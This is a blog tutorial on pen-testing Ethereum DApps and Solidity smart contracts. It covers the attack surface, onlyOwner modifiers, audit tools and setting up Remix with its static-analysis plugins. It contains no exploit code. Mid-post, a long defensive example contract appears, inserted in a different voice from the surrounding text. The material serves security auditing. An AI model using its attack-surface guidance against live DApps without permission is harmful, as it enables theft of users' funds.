<h2 style="text-align: left;">Hacking Solidity For fun and profit</h2><div>Elusive Thoughts, 2022-07-23</div><h2 style="text-align: left;">Introduction </h2><div style="text-align: justify;">After a long period of silence I am now going to write a post on hacking Solidity smart contracts for dummies (like me). The easiest way to pen-test Solidity smart contracts is through <a href="https://remix.ethereum.org/" target="_blank">REMIX</a>!!!!! This post provides an introduction to the world of smart contract security for people with a background in traditional cyber security and little knowledge of crypto and blockchain tech. While other smart contract platforms exist, we will be focusing on Ethereum, which is currently the most widely adopted platform. </div><h2 style="text-align: justify;">The Landscape In Smart Contracts</h2><div>When you start hacking smart contracts, you will instantly realize that there is NO DOCUMENTATION, NOOOOOO TUTORIALS, NO NOTHING. Do not get depressed, Elusive Thoughts is here to help you!!! 
</div><div> <div class="separator" style="clear: both; text-align: center;"><a href="https://clipground.com/images/panic-png-5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="316" data-original-width="380" height="316" src="https://clipground.com/images/panic-png-5.png" width="380" /></a></div><br /></div><div>First go through <a href="https://github.com/ethereumbook/ethereumbook">Mastering Ethereum</a>, then you are good to go.</div><div><h2 style="text-align: left;">Web Apps Versus DApps</h2></div><div><div style="text-align: justify;">On my quest to Solidity hacking,<span style="color: #f9cb9c;"> </span><span style="background-color: #fcff01;">I found this awesome info on arvanaghi</span><span style="color: #f9cb9c;"> </span>(see references below) so enjoy. When your browser interacts with a regular web application, the web app might speak to other internal servers, databases, or a cloud. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">In the end, the interaction is simple:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/standardWebApp.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="710" height="341" src="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/standardWebApp.gif" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">In a DApp, most interactions are the same. But there’s a third element: the smart contract, which is publicly accessible. 
Some interactions with the web application will lead to either a read or a write to one or multiple smart contracts on the Ethereum blockchain.</div><div style="text-align: justify;"> </div><div class="separator" style="clear: both; text-align: center;"><a href="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/standardDapp.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="710" height="341" src="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/standardDapp.gif" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Because smart contracts are publicly accessible, we can interact with them directly, unimpeded by the web server logic that might limit what transactions we can issue.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div>So far, we have a two-pronged approach to our hacking quest:</div><div><ul><li>A standard web application, which we can hack by simply exploiting authentication, access control, session management and similar flaws.</li><li>A DApp, which has a web component plus the smart contract audit element.</li></ul><div><b>Note:</b> In other words, we check for logical and input validation errors in both the web application and the smart contract logic.</div><div><br /></div><div>Below we can visualize the flows described:</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/twoprongedapproach.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="431" data-original-width="800" height="345" src="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/twoprongedapproach.png" width="640" /></a></div><br /><div><br /></div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> In order to interact with the chain directly, you can use a wallet such as MetaMask.</div><div style="text-align: justify;"><h2>Hacking DApps</h2><div>When you deploy a Smart Contract, a transaction is sent to the Blockchain. This transaction is what gives you access to your contract. So that no one else but the creator of the Smart Contract can change anything (become a super user!!), <span style="color: #ff00fe;">we essentially create a new state variable of type address called “owner”. In the Solidity language we use modifiers to build on that idea by altering function execution flow.</span></div><div><br /></div></div><div style="text-align: justify;">In Solidity, modifiers express what actions are occurring in a declarative and readable manner. They are similar to the decorator pattern used in Object Oriented Programming. In Solidity, functions are tagged with a modifier to control access; put differently, modifiers are used to modify the behavior of a function, for example by adding a prerequisite that must hold before the function executes.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see a simple modifier example:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div><i> modifier onlyOwner {</i></div><div><i> require(msg.sender == owner); </i></div><div><i> // The message sender has to be the owner (msg.sender is a global variable holding the caller's address)</i></div><div><i> _; </i></div><div><i> // The body of the function being modified is inserted here.</i></div><div><i> }</i></div><div><br /></div><div><b>Note:</b> Here we define a modifier; the <i>_;</i> placeholder marks where the body of the tagged function is executed. 
</div></div><div style="text-align: justify;"><span style="background-color: #ff00fe;"><div><br /></div><div>Below we can see how a modifier is used (through function tagging):</div><div><br /></div><div><div><i> function writeData(bytes32 data) public onlyOwner returns (bool success) {</i></div><div><i> // will only run if the owner sent the transaction</i></div><div><i> }</i></div></div><div><br /></div><div>Because of modifiers, there is actually a third prong to our attack that we have to consider. </div><div><br /></div><div>Below we can see the flow of what we just described:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/threeprongedapproach.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="800" height="336" src="https://arvanaghi.com/assets/Pentesting%20Ethereum%20dApps/threeprongedapproach.png" width="640" /></a></div><br /><div>Because DApps deal with Ethereum accounts, they are based on public key authentication. Password authentication is not used most of the time (serious DApps use JWT tokens in conjunction with public key authentication). <span style="background-color: transparent;">Though we can interact directly with the smart contract, we can’t execute privileged functions when modifiers like onlyOwner are properly implemented. </span></div><div><span style="background-color: transparent; color: #ff00fe;"><br /></span></div><div>This means that the server is acting as a middleman between you and the blockchain; put simply, the "wallet of the DApp server" holds the owner address (not always) and its private key, and you don't. A DApp with a proper security architecture does not follow this design pattern, meaning that if proper RBAC is implemented we are good to go. Also, the majority of DApps today are still using the bad design pattern described.</div><div><span style="background-color: transparent; color: #ff00fe;"><br /></span></div><div><span style="background-color: transparent; color: #ff00fe;">When dealing with a DApp, the private keys to these privileged addresses almost certainly exist on the web server.</span><span style="background-color: transparent;"> And the web application almost certainly has logic that takes user input over the web and calls a privileged function in the smart contract using one of those keys.</span></div></span></div><div style="text-align: justify;"><br /></div>All this considered, we have our attack surface:<br /><ul style="text-align: left;"><li>A standard web application assessment: test for the typical OWASP Top 10 vulnerabilities and you are covered.</li><li>A smart contract audit of the source code. </li><li>Attempting to forge privileged writes to the smart contract through the web interface. Can you get the web application to interact with the smart contract in a way it didn’t expect?</li></ul><div>So to test the DApp, we would have to use a web proxy such as Burp and also review and test the Solidity code (perform both dynamic and static code analysis). Because I have dedicated my life to writing posts on web app testing, I am going to skip the web testing. But what you should remember is to always check the key privilege checks when testing DApps. </div><div><br /></div><div><span style="color: #ff00fe;"><b>Note:</b> Also, if you try to hack legitimate DApps without permission, you should know that it is illegal, and escaping with the funds is not easy: you are going to get caught in a tornado mesh. 
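To make the three prongs concrete, here is an added example (my own illustration, not code from the original post or from arvanaghi's write-up) of the owner/modifier pattern in compilable Solidity. The contract name OwnedStore, its function names and the two-step ownership transfer are assumptions chosen for this illustration; the post's snippet only shows the modifier and writeData. It goes a little beyond the post by giving the require a reason string and by making the ownership hand-over two-step, which is how a reviewer expects a privileged address to be transferred.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

// Added illustration of the owner/modifier pattern discussed above.
// Contract and function names are constructed for this example.
contract OwnedStore {
    address public owner;          // privileged address, set once at deployment
    address public pendingOwner;   // nominee for a two-step ownership transfer
    bytes32 public data;           // the protected state

    event DataWritten(address indexed by, bytes32 value);
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    // The account that signs the creation transaction becomes the owner.
    constructor() {
        owner = msg.sender;
    }

    // Modifier: the caller must be the owner, otherwise the transaction reverts
    // with the reason string. `_;` is where the body of the tagged function runs.
    modifier onlyOwner() {
        require(msg.sender == owner, "OwnedStore: caller is not the owner");
        _;
    }

    // Privileged write: only runs when the transaction was signed by the owner key.
    function writeData(bytes32 newData) public onlyOwner returns (bool success) {
        data = newData;
        emit DataWritten(msg.sender, newData);
        return true;
    }

    // Unprivileged read: anyone calling the contract directly from a wallet can
    // read public state, which is fine because nothing changes.
    function readData() public view returns (bytes32) {
        return data;
    }

    // What the audit looks for: a state-changing function that forgot the
    // modifier. Anyone bypassing the web server could change `data` through
    // such a function, which is the "forged privileged write" of the third prong.
    // function writeDataUnprotected(bytes32 newData) public { data = newData; }

    // Two-step transfer: the current owner nominates, the nominee accepts.
    // This avoids locking the contract by transferring to a mistyped address.
    function transferOwnership(address newOwner) public onlyOwner {
        require(newOwner != address(0), "OwnedStore: new owner is the zero address");
        pendingOwner = newOwner;
    }

    function acceptOwnership() public {
        require(msg.sender == pendingOwner, "OwnedStore: caller is not the pending owner");
        emit OwnershipTransferred(owner, pendingOwner);
        owner = pendingOwner;
        pendingOwner = address(0);
    }
}
```

Deploy it from Remix's Deploy & Run Transactions panel, switch the selected account, and call writeData: the call reverts with the reason string, while readData still returns the stored value from any account. For the audit, every state-changing function that should be privileged must carry the modifier; one that lacks it is reachable by anyone who skips the web application and talks to the contract from a wallet.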
</span><br /></div><h2 style="text-align: left;">Solidity Tools For Hacking</h2></div><div style="text-align: justify;">Top tools for automating part of the Smart Contract pen-test are:</div><div><ul style="text-align: left;"><li style="text-align: justify;"><a href="https://remix.ethereum.org/#optimize=false&runs=200&evmVersion=null&version=soljson-v0.8.7+commit.e28d00a7.js" target="_blank">REMIX</a> - Remix IDE is used for the entire journey of smart contract development by users at every knowledge level.<b> It requires no setup</b>, fosters a fast development cycle and has a rich set of plugins with intuitive GUIs. The IDE comes in 2 flavors (web app or desktop app) and as a <b>VSCode extension.</b></li><li style="text-align: justify;"><a href="https://code.visualstudio.com/" target="_blank">VSCode</a> - Visual Studio Code is a lightweight but powerful source code editor which runs on your desktop and is available for Windows, macOS and Linux. It comes with built-in support for JavaScript, TypeScript and Node.js and has a rich ecosystem of extensions for other languages and runtimes (such as C++, C#, Java, Python, PHP, Go, .NET). </li><li style="text-align: justify;"><a href="https://github.com/crytic/slither" target="_blank">Slither</a> - Slither is a Solidity static analysis framework written in Python 3. It runs a suite of vulnerability detectors, prints visual information about contract details, and provides an API to easily write custom analyses. Slither enables developers to find vulnerabilities, enhance their code comprehension, and quickly prototype custom analyses.</li><li style="text-align: justify;"><a href="https://github.com/ConsenSys/mythril" target="_blank">Mythril</a> - Mythril is a security analysis tool for EVM bytecode. It detects security vulnerabilities in smart contracts built for Ethereum, Hedera, Quorum, Vechain, Rootstock, Tron and other EVM-compatible blockchains. 
It uses symbolic execution, SMT solving and taint analysis to detect a variety of security vulnerabilities. It's also used (in combination with other tools and techniques) in the MythX security analysis platform.</li></ul></div><div><h2 style="text-align: justify;">Setting Up The Hacking Environment </h2></div><div>The biggest pain in Solidity smart contract testing is configuring and adding the libraries so that the project runs smoothly. Not anymore; here is an easy way to do it.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ffreepngimg.com%2Fthumb%2Fpain%2F40861-6-pain-in-the-neck-download-hq-png.png&f=1&nofb=1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="426" data-original-width="400" height="426" src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ffreepngimg.com%2Fthumb%2Fpain%2F40861-6-pain-in-the-neck-download-hq-png.png&f=1&nofb=1" width="400" /></a></div><div><br /></div><div><br /></div><div><b>Step One: </b>Load the project from Github to Remix :- In the top left corner click Clone Git Repository.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJTLmwgIBK7y6ZXCIqEUXqrkAuLmx8lRZVY2iPIUw2VjohKPeeJ6mzHDjPvbN2tHuPW8VIC4fCp78x_5JqtomNGOSgNoobOjmQs-opKksXCNmV94oWruyULGQpClbRJj_FtbRgsn2L3u5zH8BYWajneRQY1D64cgRDyvFCDZa1ekqik8_WAC0pweom/s317/Screenshot%20from%202022-07-21%2015-07-37.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="142" data-original-width="317" height="179" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJTLmwgIBK7y6ZXCIqEUXqrkAuLmx8lRZVY2iPIUw2VjohKPeeJ6mzHDjPvbN2tHuPW8VIC4fCp78x_5JqtomNGOSgNoobOjmQs-opKksXCNmV94oWruyULGQpClbRJj_FtbRgsn2L3u5zH8BYWajneRQY1D64cgRDyvFCDZa1ekqik8_WAC0pweom/w400-h179/Screenshot%20from%202022-07-21%2015-07-37.png" width="400" /></a></div><br /><b>Note:</b> Most of the time the client will give you a public git repo URL to load the code (or a private git repo URL). Now with Remix, you can load it directly.</div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4Bl8Cg7U4ntwPhNKbosvTVMS6QqYq-RoqJ7jh_etDaB2UckoTl2ig6xeEhAWpkopbuJzCu3cGIJIPLx5dIso-M2Bw2Zl_NN8-nwExyHAFqLksixEK5fsMUfrClciADkdo4grgh7ahNGXZs-F3Uxwva_0Dgw03GjcoefqywVd9JpoRMG1xVAAwzT-2/s480/Screenshot%20from%202022-07-21%2015-30-12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="169" data-original-width="480" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4Bl8Cg7U4ntwPhNKbosvTVMS6QqYq-RoqJ7jh_etDaB2UckoTl2ig6xeEhAWpkopbuJzCu3cGIJIPLx5dIso-M2Bw2Zl_NN8-nwExyHAFqLksixEK5fsMUfrClciADkdo4grgh7ahNGXZs-F3Uxwva_0Dgw03GjcoefqywVd9JpoRMG1xVAAwzT-2/w400-h141/Screenshot%20from%202022-07-21%2015-30-12.png" width="400" /></a></div><br /><div><b><br /></b></div><div><b>Note:</b> When you upload confidential code to Remix (a hosted web IDE), you had better have permission, or the code is patented.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs_Am079RozwfkC7IAVxZHo-xvRdJIDiFL0d3JIK9Em8tjtRiSt5gtgWqald8rJ3VSEtz7JA43yQctdjlftTILdJSlqYsDuy85G4CkclmV9GeF6NoE64yvnk8VAHQ6yfDwXJtCcS2Selum0o9YAwCLSW0-jFi6yvZTzkMN-DvQwQt-guLrDnYurgDm/s301/Screenshot%20from%202022-07-21%2015-32-40.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" 
data-original-height="280" data-original-width="301" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs_Am079RozwfkC7IAVxZHo-xvRdJIDiFL0d3JIK9Em8tjtRiSt5gtgWqald8rJ3VSEtz7JA43yQctdjlftTILdJSlqYsDuy85G4CkclmV9GeF6NoE64yvnk8VAHQ6yfDwXJtCcS2Selum0o9YAwCLSW0-jFi6yvZTzkMN-DvQwQt-guLrDnYurgDm/w400-h372/Screenshot%20from%202022-07-21%2015-32-40.png" width="400" /></a></div><br /> </div><div><b>Step Two: </b>Compile your code and troubleshoot :- </div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcSTSBSxculiOpSY_2HYyrxqiXQ8Yu444g3N_drGOoUnJWA45gAIstFBdyeOO2PAaZB26yqCiTaoQNb_cuizVN-cEx-T5NaLvzF_hagwC0Y7aaJtv_h2jCEKWvp4SXy3QFmUuFIY5l7E6zCXXvRcxTEsDNhNj5j4fpSol1dEm9WsANblHhChjlUs_D/s372/Screenshot%20from%202022-07-21%2015-38-13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="372" data-original-width="299" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcSTSBSxculiOpSY_2HYyrxqiXQ8Yu444g3N_drGOoUnJWA45gAIstFBdyeOO2PAaZB26yqCiTaoQNb_cuizVN-cEx-T5NaLvzF_hagwC0Y7aaJtv_h2jCEKWvp4SXy3QFmUuFIY5l7E6zCXXvRcxTEsDNhNj5j4fpSol1dEm9WsANblHhChjlUs_D/w321-h400/Screenshot%20from%202022-07-21%2015-38-13.png" width="321" /></a></div><div><br /></div><b>Note:</b> It is worth mentioning that the Remix compiler will also generate the relevant project files, which you can download and use on your workstation with some modifications. 
<br /><div><br /></div><div><b>Step Three:</b> Fixing import errors:- </div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQiKsP4l5BpPVHucyAQSsEHgBgHHZY0vfRarC1XHaVBAU0thF43wypalOwJBUsrQTJo1H7CtQzAf9WFG-paGKFY8yka_L9h8YclZNxLa4HBt9aQSygTjMEvPO4Wx94ZJxzp62nJutOYgDpL11dN2lpXmmfz42rEqpv3LShGnjGKzkUdlZ6YUQoOfez/s925/Screenshot%20from%202022-07-21%2016-24-50.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="925" data-original-width="294" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQiKsP4l5BpPVHucyAQSsEHgBgHHZY0vfRarC1XHaVBAU0thF43wypalOwJBUsrQTJo1H7CtQzAf9WFG-paGKFY8yka_L9h8YclZNxLa4HBt9aQSygTjMEvPO4Wx94ZJxzp62nJutOYgDpL11dN2lpXmmfz42rEqpv3LShGnjGKzkUdlZ6YUQoOfez/w203-h640/Screenshot%20from%202022-07-21%2016-24-50.png" width="203" /></a></div><br /><div>In order to resolve the issue we refer to the online tutorial REMIX guide found <a href="https://remix-ide.readthedocs.io/en/latest/import.html" target="_blank">here</a>. 
It says, more or less, to replace the original path:</div><blockquote><i>import "../../utils/introspection/IERC165.sol";</i></blockquote><div>with </div><div><blockquote><i>import "https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/utils/introspection/IERC165.sol";</i></blockquote></div><div><br /></div><div>And then taddaaaaaa, magic happens, the code compiles!!!</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTeQ5TaV2AuV6pu1nWBh-34DxrFxSCWekFb2efEa4Gd04HOLc2AuyVetHVyvezMRPlnM3vPmcnteWvNWKPUIjxWjrpOtaGGvfXH8C424MFkXNyhVVXftedzei6oToF8ahMZdRR9rxCbLUpq0uNf9VAYS1dFjSXMeDjR8Q4CmPojSnmsE5p-tFYFHMW/s785/Screenshot%20from%202022-07-21%2016-43-49.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="469" data-original-width="785" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTeQ5TaV2AuV6pu1nWBh-34DxrFxSCWekFb2efEa4Gd04HOLc2AuyVetHVyvezMRPlnM3vPmcnteWvNWKPUIjxWjrpOtaGGvfXH8C424MFkXNyhVVXftedzei6oToF8ahMZdRR9rxCbLUpq0uNf9VAYS1dFjSXMeDjR8Q4CmPojSnmsE5p-tFYFHMW/w640-h382/Screenshot%20from%202022-07-21%2016-43-49.png" width="640" /></a></div><br /><div><br /></div><div><h2 style="text-align: justify;">Remix Debugging and Security Plugins</h2></div><div style="text-align: justify;">Remix, besides an online compiler, also has awesome!!!! plugins, including one for static analysis. Static code analysis is a process of debugging code by examining it without actually executing it. The Solidity Static Analysis plugin performs static analysis on Solidity smart contracts once they are compiled. It checks for security vulnerabilities and bad development practices, among other issues. 
It can be activated from the Remix Plugin Manager.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Another plugin you would also like to install is MythX by ConsenSys. MythX is a security analysis service that performs static and dynamic security analysis using the MythX Cloud Service. MythX offers a suite of analysis techniques that automatically detect security vulnerabilities in Ethereum smart contracts. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> MythX requires an API key to work with Remix.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Step Four: </b>Installing the static analysis plugin. In order to install the plugin, go to the bottom left corner.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE_eRbEBzB_vilJTBlxf7B0l6b3MxUB2j3kUq12R-4-QCYLMSa_x_KzneNa3twtwjs-cdtzDmO4V5i6ba4WdKALIImFYTH7ZbIUvKgXQ3MbGmMlPJpcmEI_oTQ3OWSdFD7UfmwvqVhWaxUA-Y9jX2lT2fGP0g9LwIhJ58WIrhwFmrbXGvGrTcPcw9C/s334/Screenshot%20from%202022-07-23%2014-22-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="334" data-original-width="221" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE_eRbEBzB_vilJTBlxf7B0l6b3MxUB2j3kUq12R-4-QCYLMSa_x_KzneNa3twtwjs-cdtzDmO4V5i6ba4WdKALIImFYTH7ZbIUvKgXQ3MbGmMlPJpcmEI_oTQ3OWSdFD7UfmwvqVhWaxUA-Y9jX2lT2fGP0g9LwIhJ58WIrhwFmrbXGvGrTcPcw9C/w265-h400/Screenshot%20from%202022-07-23%2014-22-34.png" width="265" /></a></div><div><br /></div><b>Step Five: </b>Use the plugin manager's search box to find the plugins you want for your hacks (type "static analysis").<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxK9YVbGwcpMRvogkYFEb0WKWsmeAOWRFqyuyj4JaJ96Q99Pw6rs0Z7grCaBZqDuQkMa7WClHC6pY4tqzdTffzTQ-H7XoFVqFqUXban7SLX7OD-2Qb76xWcYBhdpusBcfqZWLyYKsEQE4pLNsfJ56x0XPOphYoAZGXvb3tfScokxsEriYXdTrFNDyF/s936/Screenshot%20from%202022-07-23%2014-25-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="936" data-original-width="368" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxK9YVbGwcpMRvogkYFEb0WKWsmeAOWRFqyuyj4JaJ96Q99Pw6rs0Z7grCaBZqDuQkMa7WClHC6pY4tqzdTffzTQ-H7XoFVqFqUXban7SLX7OD-2Qb76xWcYBhdpusBcfqZWLyYKsEQE4pLNsfJ56x0XPOphYoAZGXvb3tfScokxsEriYXdTrFNDyF/w252-h640/Screenshot%20from%202022-07-23%2014-25-02.png" width="252" /></a></div><div><br /></div><div><b><br /></b></div><div><b>Note:</b> There are numerous plugins you can choose from to install. Search the ones you like. </div><div><br /></div><div>Below we can see the plugins to install (static analysis):</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5f282DJ6VRPqI9RXN4RKgDCTGXsypNGHYcHVL5ToA-Cm3zLLhSMGhAgAfcFVXBlD2sBYUht_MarRa7HS8_r9xlYROQMyOA0ELFXvPtCpDibK24FfFjIYzpTL2bqKVs-jKH_5jeFL3FIWtc7lLxRh3CmzRJgghMyEfBGAgTo9BnkxIpdg_ngFLf-5V/s399/Screenshot%20from%202022-07-23%2014-30-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="399" data-original-width="383" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5f282DJ6VRPqI9RXN4RKgDCTGXsypNGHYcHVL5ToA-Cm3zLLhSMGhAgAfcFVXBlD2sBYUht_MarRa7HS8_r9xlYROQMyOA0ELFXvPtCpDibK24FfFjIYzpTL2bqKVs-jKH_5jeFL3FIWtc7lLxRh3CmzRJgghMyEfBGAgTo9BnkxIpdg_ngFLf-5V/w384-h400/Screenshot%20from%202022-07-23%2014-30-16.png" width="384" /></a></div><br /><div>Below we can see the plugins to install (MYTHX):</div><div><br /></div><div class="separator" style="clear: 
both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjekQZ_LEplXScpMf2iJsQzZFEHxtXNpJQFAdVb5po2K-WFY_fuLOWh_J8dDBXfSv72NGnlWgIZoIUXHSEmYBt0UOEE-5YHTMpUFhszszfafbWdG7O3tU8AvPI6N93ixFuBvQ-6vzSBG9RExfF8DgZQtHfnxcUFIRtL6b9T0Ak2r8mhm0Uf-QLSicku/s399/Screenshot%20from%202022-07-23%2014-31-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="399" data-original-width="383" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjekQZ_LEplXScpMf2iJsQzZFEHxtXNpJQFAdVb5po2K-WFY_fuLOWh_J8dDBXfSv72NGnlWgIZoIUXHSEmYBt0UOEE-5YHTMpUFhszszfafbWdG7O3tU8AvPI6N93ixFuBvQ-6vzSBG9RExfF8DgZQtHfnxcUFIRtL6b9T0Ak2r8mhm0Uf-QLSicku/w384-h400/Screenshot%20from%202022-07-23%2014-31-59.png" width="384" /></a></div><br /><div><br /></div><div><b>Note:</b> The plugin depends on the <i>Solidity Compiler plugin</i>, which you also need to activate.</div><div><br /></div><div>The static analysis plugin checks for the following security issues:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAxjrCywwEbyv4mi4BY8CLTk0zC6mpb2ZTO-y1GkNo1NG98-Gb1n40pg9gdeDmPaXezyVpfffc3hg_APIivRCwxWgqzLbFyJGCqDQB1ajvBWg2atPd3xzPcS0-b_4ytZwSGSZJrYMHFCCs7qkvZ5WQXA_zSkuanOCcj66o_hiKI3bfD1jWv-LAEXHc/s454/Screenshot%20from%202022-07-23%2015-10-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="454" data-original-width="340" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAxjrCywwEbyv4mi4BY8CLTk0zC6mpb2ZTO-y1GkNo1NG98-Gb1n40pg9gdeDmPaXezyVpfffc3hg_APIivRCwxWgqzLbFyJGCqDQB1ajvBWg2atPd3xzPcS0-b_4ytZwSGSZJrYMHFCCs7qkvZ5WQXA_zSkuanOCcj66o_hiKI3bfD1jWv-LAEXHc/w300-h400/Screenshot%20from%202022-07-23%2015-10-26.png" width="300" /></a></div><br /><div><br /></div><div>The static analysis plugin also looks for non-security issues. 
Some of the issues shown below can be used to perform Gas Denial of Service attacks so pay attention!!!!!: </div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOWOs6nWC_NZGJOKEQsA97Y1M7l3dSoJ2dBXKPec-7MGoOqr0Edi-8vhpVQKye0KYhOCijakMeInECUVRJhFKBnG9-FghOIy1o1yjVyNeu_degRVjm7zQAnWqXF5I2Lcm68MvbEbJ9ismO70h0jC3zjsAjTMyuuufGCQZWG9EMofExyTq_ywrBy1vi/s879/Screenshot%20from%202022-07-23%2015-09-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="879" data-original-width="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOWOs6nWC_NZGJOKEQsA97Y1M7l3dSoJ2dBXKPec-7MGoOqr0Edi-8vhpVQKye0KYhOCijakMeInECUVRJhFKBnG9-FghOIy1o1yjVyNeu_degRVjm7zQAnWqXF5I2Lcm68MvbEbJ9ismO70h0jC3zjsAjTMyuuufGCQZWG9EMofExyTq_ywrBy1vi/s16000/Screenshot%20from%202022-07-23%2015-09-39.png" /></a></div><br /><div><div>The report generated by the static analysis plugin will look like this:</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhabTUK_oFgKNvcu2yHPVRRy3I4cAwgQcV5pVfED3_yZhSdJIrjcRNiZGpE5Q3ouOu3ATDBQyoN7bbIkdfNjnbjOj8E023y-cCZvzwVwl5rkdnvRT1aRG7qx9qxGJOhdEyKdFlcfiXOpbIchYAr3dkW_RED0UDGt3OMWf-kMovEGScI3GlOogbAJgqw/s338/Screenshot%20from%202022-07-23%2015-16-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="332" data-original-width="338" height="393" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhabTUK_oFgKNvcu2yHPVRRy3I4cAwgQcV5pVfED3_yZhSdJIrjcRNiZGpE5Q3ouOu3ATDBQyoN7bbIkdfNjnbjOj8E023y-cCZvzwVwl5rkdnvRT1aRG7qx9qxGJOhdEyKdFlcfiXOpbIchYAr3dkW_RED0UDGt3OMWf-kMovEGScI3GlOogbAJgqw/w400-h393/Screenshot%20from%202022-07-23%2015-16-48.png" width="400" /></a></div><b><div><b><br 
